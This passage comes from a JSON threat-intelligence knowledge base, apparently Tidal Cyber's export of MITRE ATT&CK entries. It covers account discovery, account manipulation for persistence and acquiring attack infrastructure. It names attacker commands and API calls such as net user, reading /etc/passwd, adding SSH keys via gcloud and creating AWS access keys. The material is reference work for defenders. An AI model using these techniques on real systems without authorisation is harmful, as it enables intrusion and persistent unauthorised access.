"description": "Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).<sup>[[Microsoft Exchange Address Lists](https://app.tidalcyber.com/references/138ec24a-4361-4ce0-b78e-508c11db397c)]</sup>\n\nIn on-premises Exchange and Exchange Online, the<code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.<sup>[[Microsoft getglobaladdresslist](https://app.tidalcyber.com/references/a4948a80-d11c-44ed-ae63-e3f5660463f9)]</sup><sup>[[Black Hills Attacking Exchange MailSniper, 2016](https://app.tidalcyber.com/references/adedfddc-29b7-4245-aa67-cc590acb7434)]</sup>\n\nIn Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.<sup>[[Google Workspace Global Access List](https://app.tidalcyber.com/references/5104f0ea-1fb6-4260-a9b6-95922b3a8e5b)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1087.003"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "b31b014b-0b59-4493-966b-a57ad68f073d",
"value": "Email Account"
},
{
"description": "Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.\n\nCommands such as <code>net user</code> and <code>net localgroup</code> of the [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility and <code>id</code> and <code>groups</code>on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the <code>/etc/passwd</code> file. On macOS the <code>dscl . list /Users</code> command can be used to enumerate local accounts.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1087.001"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "df5f6835-ca0a-4ef5-bb3a-b011e4025545",
"value": "Local Account - Duplicate"
},
{
"description": "Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).\n\nAdversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.\n\nFor examples, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries can use default [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected systems files.",
"meta": {
"platforms": [
"Azure AD",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
},
{
"dest-uuid": "d76c3dde-dba5-4748-8d51-c93fc34f885e",
"type": "similar"
},
{
"dest-uuid": "12908bde-a5eb-40a5-ae27-d93960d0bfdc",
"type": "similar"
},
{
"dest-uuid": "b31b014b-0b59-4493-966b-a57ad68f073d",
"type": "similar"
},
{
"dest-uuid": "df5f6835-ca0a-4ef5-bb3a-b011e4025545",
"type": "similar"
}
],
"uuid": "6736995e-b9ea-401b-81fa-6caeb7a17ce3",
"value": "Account Discovery"
},
{
"description": "Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.\n\nFor example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.<sup>[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)]</sup><sup>[[Blue Cloud of Death](https://app.tidalcyber.com/references/0c764280-9d8c-4fa4-9088-170f02550d4c)]</sup><sup>[[Blue Cloud of Death Video](https://app.tidalcyber.com/references/39b0adf6-c71e-4501-b8bb-fab82718486b)]</sup> These credentials include both x509 keys and passwords.<sup>[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)]</sup> With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.<sup>[[Demystifying Azure AD Service Principals](https://app.tidalcyber.com/references/3e285884-2191-4773-9243-74100ce177c8)]</sup>\n\nIn infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://app.tidalcyber.com/technique/3c4a2f3a-5877-4a27-a417-76318523657e), adversaries may generate or import their own SSH keys using either the <code>CreateKeyPair</code> or <code>ImportKeyPair</code> API in AWS or the <code>gcloud compute os-login ssh-keys add</code> command in GCP.<sup>[[GCP SSH Key Add](https://app.tidalcyber.com/references/372b6cfd-abdc-41b7-be78-4b1dc0426044)]</sup> This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.<sup>[[Expel IO Evil in AWS](https://app.tidalcyber.com/references/4c2424d6-670b-4db0-a752-868b4c954e29)]</sup><sup>[[Expel Behind the Scenes](https://app.tidalcyber.com/references/d538026c-da30-48d2-bc30-fde3776db1a8)]</sup>\n\nAdversaries may also use the <code>CreateAccessKey</code> API in AWS or the <code>gcloud iam service-accounts keys create</code> command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://app.tidalcyber.com/technique/3c4a2f3a-5877-4a27-a417-76318523657e)).<sup>[[Rhino Security Labs AWS Privilege Escalation](https://app.tidalcyber.com/references/693e5783-4aa1-40ce-8080-cec01c3e7b59)]</sup><sup>[[Sysdig ScarletEel 2.0](https://app.tidalcyber.com/references/90e60242-82d8-5648-b7e4-def6fd508e16)]</sup> For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principals roles and permissions, which may be different from those of the Application Administrator.<sup>[[SpecterOps Azure Privilege Escalation](https://app.tidalcyber.com/references/5dba5a6d-465e-4489-bc4d-299a891b62f6)]</sup> \n\nIn AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials tied to the permissions of the original user account. These credentials may remain valid for the duration of their lifetime even if the original accounts API credentials are deactivated.\n<sup>[[Crowdstrike AWS User Federation Persistence](https://app.tidalcyber.com/references/8c4f806c-b6f2-5bde-8525-05da6692e59c)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1098.001"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "0799f2ee-3a83-452e-9fa9-83e91d83be25",
"value": "Additional Cloud Credentials"
},
{
"description": "An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.<sup>[[AWS IAM Policies and Permissions](https://app.tidalcyber.com/references/9bb520fa-0c4f-48aa-8b0a-8f1d42ee1d0c)]</sup><sup>[[Google Cloud IAM Policies](https://app.tidalcyber.com/references/b23a0df2-923d-4a5d-a40c-3ae218a0be94)]</sup><sup>[[Microsoft Support O365 Add Another Admin, October 2019](https://app.tidalcyber.com/references/c31cfc48-289e-42aa-8046-b41261fdeb96)]</sup><sup>[[Microsoft O365 Admin Roles](https://app.tidalcyber.com/references/8014a0cc-f793-4d9a-a2cc-ef9e9c5a826a)]</sup> With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).<sup>[[Expel AWS Attacker](https://app.tidalcyber.com/references/089f6f4e-370c-49cb-a35c-c80be0fd39de)]</sup>\n<sup>[[Microsoft O365 Admin Roles](https://app.tidalcyber.com/references/8014a0cc-f793-4d9a-a2cc-ef9e9c5a826a)]</sup> \n\nThis account modification may immediately follow [Create Account](https://app.tidalcyber.com/technique/55bcf759-a0bf-47e9-99f8-4e8ca997e6ce) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.\n\nFor example, in AWS environments, an adversary with appropriate permissions may be able to use the <code>CreatePolicyVersion</code> API to define a new version of an IAM policy or the <code>AttachUserPolicy</code> API to attach an IAM policy with additional or distinct permissions to a compromised user account.<sup>[[Rhino Security Labs AWS Privilege Escalation](https://app.tidalcyber.com/references/693e5783-4aa1-40ce-8080-cec01c3e7b59)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1098.003"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "71867386-ddc2-4cdb-a0c9-7c27172c23c1",
"value": "Additional Cloud Roles"
},
{
"description": "An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For example, an adversary with sufficient permissions may create a RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account.<sup>[[Kubernetes RBAC](https://app.tidalcyber.com/references/37c0e0e1-cc4d-5a93-b8a0-224f031b7324)]</sup><sup>[[Aquasec Kubernetes Attack 2023](https://app.tidalcyber.com/references/6d6e2fc8-9806-5480-bfaa-a43a962a4980)]</sup> Where attribute-based access control (ABAC) is in use, an adversary with sufficient permissions may modify a Kubernetes ABAC policy to give the target account additional permissions.<sup>[[Kuberentes ABAC](https://app.tidalcyber.com/references/7f960599-a3d6-53bb-91ff-f0e6117a30ed)]</sup>\n \nThis account modification may immediately follow [Create Account](https://app.tidalcyber.com/technique/55bcf759-a0bf-47e9-99f8-4e8ca997e6ce) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) that they have compromised. \n\nNote that where container orchestration systems are deployed in cloud environments, as with Google Kubernetes Engine, Amazon Elastic Kubernetes Service, and Azure Kubernetes Service, cloud-based role-based access control (RBAC) assignments or ABAC policies can often be used in place of or in addition to local permission assignments.<sup>[[Google Cloud Kubernetes IAM](https://app.tidalcyber.com/references/e8ee3ac6-ae7c-5fd3-a339-b579a419dd96)]</sup><sup>[[AWS EKS IAM Roles for Service Accounts](https://app.tidalcyber.com/references/b2452f0e-93b0-55b7-add8-8338d171f0bf)]</sup><sup>[[Microsoft Azure Kubernetes Service Service Accounts](https://app.tidalcyber.com/references/bf374b41-b2a3-5c07-bf84-9ea0e1a9e6c5)]</sup> In these cases, this technique may be used in conjunction with [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1098.006"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "1169afd3-d80d-5942-b16f-8dc1812ef6bb",
"value": "Additional Container Cluster Roles"
},
{
"description": "Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. \n\nFor example, the <code>Add-MailboxPermission</code> [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.<sup>[[Microsoft - Add-MailboxPermission](https://app.tidalcyber.com/references/b8d40efb-c78d-47dd-9d83-e5a31af73691)]</sup><sup>[[FireEye APT35 2018](https://app.tidalcyber.com/references/71d3db50-4a20-4d8e-a640-4670d642205c)]</sup><sup>[[Crowdstrike Hiding in Plain Sight 2018](https://app.tidalcyber.com/references/8612fb31-5806-47ca-ba43-265a590b61fb)]</sup> In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.<sup>[[Gmail Delegation](https://app.tidalcyber.com/references/dfd28a01-56ba-4c0c-9742-d8b1db49df06)]</sup><sup>[[Google Ensuring Your Information is Safe](https://app.tidalcyber.com/references/ad3eda19-08eb-4d59-a2c9-3b5ed8302205)]</sup> \n\nAdversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target users mail folders.<sup>[[Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452](https://app.tidalcyber.com/references/7aa5c294-df8e-4994-9b9e-69444d75ef37)]</sup>\n\nThis may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b)), so the messages evade spam/phishing detection mechanisms.<sup>[[Bienstock, D. - Defending O365 - 2019](https://app.tidalcyber.com/references/4866e6c3-c1b2-4131-bd8f-0ac228168a10)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1098.002"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "15660958-1f4f-4136-8cda-82123fd38232",
"value": "Additional Email Delegate Permissions"
},
{
"description": "Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.\n\nMFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a users credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.<sup>[[CISA MFA PrintNightmare](https://app.tidalcyber.com/references/fa03324e-c79c-422e-80f1-c270fd87d4e2)]</sup><sup>[[DarkReading FireEye SolarWinds](https://app.tidalcyber.com/references/a662c764-8954-493f-88e5-e022e093a785)]</sup> In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. <sup>[[Mandiant APT29 Microsoft 365 2022](https://app.tidalcyber.com/references/e141408e-d22b-58e4-884f-0cbff25444da)]</sup>\n\nSimilarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.<sup>[[AADInternals - Device Registration](https://app.tidalcyber.com/references/978b408d-f9e9-422c-b2d7-741f6cc298d4)]</sup><sup>[[AADInternals - Conditional Access Bypass](https://app.tidalcyber.com/references/832841a1-92d1-4fcc-90f7-afbabad84aec)]</sup><sup>[[Microsoft DEV-0537](https://app.tidalcyber.com/references/2f7a59f3-620d-4e2e-8595-af96cd4e16c3)]</sup> \n\nDevices registered in Azure AD may be able to conduct [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.<sup>[[Microsoft - Device Registration](https://app.tidalcyber.com/references/3f42fc18-2adc-46ef-ae0a-c2d530518435)]</sup> Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://app.tidalcyber.com/technique/03619027-8a54-4cb2-8f1d-38d476edbdd8) on an Azure AD tenant by registering a large number of devices.<sup>[[AADInternals - BPRT](https://app.tidalcyber.com/references/19af3fce-eb57-4e67-9678-1968e9ea9677)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1098.005"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "34ffaa47-f591-4a44-bd7d-9790d81365cd",
"value": "Device Registration"
},
{
"description": "Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The <code>authorized_keys</code> file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <code>&lt;user-home&gt;/.ssh/authorized_keys</code>.<sup>[[SSH Authorized Keys](https://app.tidalcyber.com/references/ff100b76-894e-4d7c-9b8d-5f0eedcf59cc)]</sup> Users may edit the systems SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under <code>/etc/ssh/sshd_config</code>.\n\nAdversaries may modify SSH <code>authorized_keys</code> files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLIs “add-metadata” command an adversary may add SSH keys to a user account.<sup>[[Google Cloud Add Metadata](https://app.tidalcyber.com/references/eba4b850-8784-4da2-b87d-54b5bd0f58d6)]</sup><sup>[[Google Cloud Privilege Escalation](https://app.tidalcyber.com/references/3dc4b69c-8cae-4489-8df2-5f55419fb3b1)]</sup> Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.<sup>[[Azure Update Virtual Machines](https://app.tidalcyber.com/references/299f231f-70d1-4c1a-818f-8a01cf65382c)]</sup> This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.<sup>[[Venafi SSH Key Abuse](https://app.tidalcyber.com/references/cba14230-13bc-47ad-8f3f-d798217657bd)]</sup><sup>[[Cybereason Linux Exim Worm](https://app.tidalcyber.com/references/9523d8ae-d749-4c25-8c7b-df2d8c25c3c8)]</sup> It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.\n\nWhere authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. \n\nSSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) command.<sup>[[cisco_ip_ssh_pubkey_ch_cmd](https://app.tidalcyber.com/references/c6ffe974-f304-598c-bc4d-5da607c73802)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1098.004"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "4659b96f-0e8d-4480-966b-c75062645f14",
"value": "SSH Authorized Keys"
},
{
"description": "Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. \n\nIn order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).",
"meta": {
"platforms": [
"Azure AD",
"Containers",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Network",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "0799f2ee-3a83-452e-9fa9-83e91d83be25",
"type": "similar"
},
{
"dest-uuid": "71867386-ddc2-4cdb-a0c9-7c27172c23c1",
"type": "similar"
},
{
"dest-uuid": "1169afd3-d80d-5942-b16f-8dc1812ef6bb",
"type": "similar"
},
{
"dest-uuid": "15660958-1f4f-4136-8cda-82123fd38232",
"type": "similar"
},
{
"dest-uuid": "34ffaa47-f591-4a44-bd7d-9790d81365cd",
"type": "similar"
},
{
"dest-uuid": "4659b96f-0e8d-4480-966b-c75062645f14",
"type": "similar"
}
],
"uuid": "65f7482c-485b-4fd7-80f5-0ec6e923ac4d",
"value": "Account Manipulation"
},
{
"description": "Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.<sup>[[Microsoft Ransomware as a Service](https://app.tidalcyber.com/references/833018b5-6ef6-5327-9af5-1a551df25cd2)]</sup><sup>[[CrowdStrike Access Brokers](https://app.tidalcyber.com/references/0f772693-e09d-5c82-85c2-77f5fee39ef0)]</sup><sup>[[Krebs Access Brokers Fortune 500](https://app.tidalcyber.com/references/37d237ae-f0a8-5b30-8f97-d751c1560391)]</sup> In some cases, adversary groups may form partnerships to share compromised systems with each other.<sup>[[CISA Karakurt 2022](https://app.tidalcyber.com/references/5a9a79fa-532b-582b-9741-cb732803cd22)]</sup>\n\nFootholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., [Web Shell](https://app.tidalcyber.com/technique/05a5318f-476d-44c1-8a85-9466295d31dd)) or established access via [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4). In some cases, access brokers will implant compromised systems with a “load” that can be used to install additional malware for paying customers.<sup>[[Microsoft Ransomware as a Service](https://app.tidalcyber.com/references/833018b5-6ef6-5327-9af5-1a551df25cd2)]</sup>\n\nBy leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.<sup>[[Microsoft Ransomware as a Service](https://app.tidalcyber.com/references/833018b5-6ef6-5327-9af5-1a551df25cd2)]</sup><sup>[[CrowdStrike Access Brokers](https://app.tidalcyber.com/references/0f772693-e09d-5c82-85c2-77f5fee39ef0)]</sup>\n\nIn some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf), [Multi-Factor Authentication Interception](https://app.tidalcyber.com/technique/600d45ec-cb9c-47b8-ae94-326471ebb007), or even [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f).\n\n**Note:** while this technique is distinct from other behaviors such as [Purchase Technical Data](https://app.tidalcyber.com/technique/56ab198f-f8bb-4fe9-bd85-5975d4d3863b) and [Credentials](https://app.tidalcyber.com/technique/e5d9c785-61bd-483f-b2ac-5bd9a8641b22), they may often be used in conjunction (especially where the acquired foothold requires [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "478da817-1914-50f6-b1fd-434081a34354",
"value": "Acquire Access"
},
{
"description": "Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.<sup>[[Norton Botnet](https://app.tidalcyber.com/references/f97427f1-ea16-4e92-a4a2-4d62a800df15)]</sup> Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or Distributed Denial of Service (DDoS).<sup>[[Imperva DDoS for Hire](https://app.tidalcyber.com/references/86f87ec6-058e-45a7-9314-0579a2b4e8f2)]</sup><sup>[[Krebs-Anna](https://app.tidalcyber.com/references/028b7582-be46-4642-9e36-b781cac66340)]</sup><sup>[[Krebs-Bazaar](https://app.tidalcyber.com/references/b46efda2-18e0-451e-b945-28421c2d5274)]</sup><sup>[[Krebs-Booter](https://app.tidalcyber.com/references/d29a88ae-273b-439e-8808-dc9931f1ff72)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1583.005"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "be637d66-5110-4872-bc15-63b062c3f290",
"value": "Botnet - Duplicate"
},
{
"description": "Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://app.tidalcyber.com/technique/8a7afe43-b814-41b3-8bd8-e1301b8ba5b4)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.\n\nBy running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://app.tidalcyber.com/technique/5c6c3492-5dbc-43ee-a3f2-ba1976d3b379)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.<sup>[[Unit42 DNS Mar 2019](https://app.tidalcyber.com/references/e41fde80-5ced-4f66-9852-392d1ef79520)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1583.002"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "bae33d7b-c835-4eda-b310-bf426270c0b1",
"value": "DNS Server"
},
{
"description": "Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.\n\nAdversaries may use acquired domains for a variety of purposes, including for [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), and Command and Control.<sup>[[CISA MSS Sep 2020](https://app.tidalcyber.com/references/ffe613e3-b528-42bf-81d5-4d8de38b3457)]</sup> Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).<sup>[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)]</sup><sup>[[PaypalScam](https://app.tidalcyber.com/references/bcea7897-6cb2-467d-ad3b-ffd20badf19f)]</sup> Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute \"IDN homograph attacks,\" creating visually similar lookalike domains used to deliver malware to victim machines.<sup>[[CISA IDN ST05-016](https://app.tidalcyber.com/references/3cc2c996-10e9-4e25-999c-21dc2c69e4af)]</sup><sup>[[tt_httrack_fake_domains](https://app.tidalcyber.com/references/9bdda422-dbf7-4b70-a7b1-9e3ad658c239)]</sup><sup>[[tt_obliqueRAT](https://app.tidalcyber.com/references/be1e3092-1981-457b-ae76-b55b057e1d73)]</sup><sup>[[httrack_unhcr](https://app.tidalcyber.com/references/a4a3fd3d-1c13-40e5-b462-fa69a1861986)]</sup><sup>[[lazgroup_idn_phishing](https://app.tidalcyber.com/references/83de363d-b575-4851-9c2d-a78f504cf754)]</sup>\n\nAdversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.<sup>[[Categorisation_not_boundary](https://app.tidalcyber.com/references/3c320f38-e691-46f7-a20d-58b024ea2fa2)]</sup><sup>[[Domain_Steal_CC](https://app.tidalcyber.com/references/30ab5d35-db9b-401f-89cb-73f2c7fea060)]</sup><sup>[[Redirectors_Domain_Fronting](https://app.tidalcyber.com/references/42c81d97-b6ee-458e-bff3-e8c4de882cd6)]</sup><sup>[[bypass_webproxy_filtering](https://app.tidalcyber.com/references/fab84597-99a0-4560-8c8c-11fd8c01d5fa)]</sup>\n\nDomain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1583.001"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d",
"value": "Domains - Duplicate"
},
{
"description": "Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements.<sup>[[spamhaus-malvertising](https://app.tidalcyber.com/references/15a4d429-28c3-52be-aeb8-d94ad2743866)]</sup> Purchased ads may also target specific audiences using the advertising networks capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites. \n\nAdversaries may purchase ads and other resources to help distribute artifacts containing malicious code to victims. Purchased ads may attempt to impersonate or spoof well-known brands. For example, these spoofed ads may trick victims into clicking the ad which could then send them to a malicious domain that may be a clone of official websites containing trojanized versions of the advertised 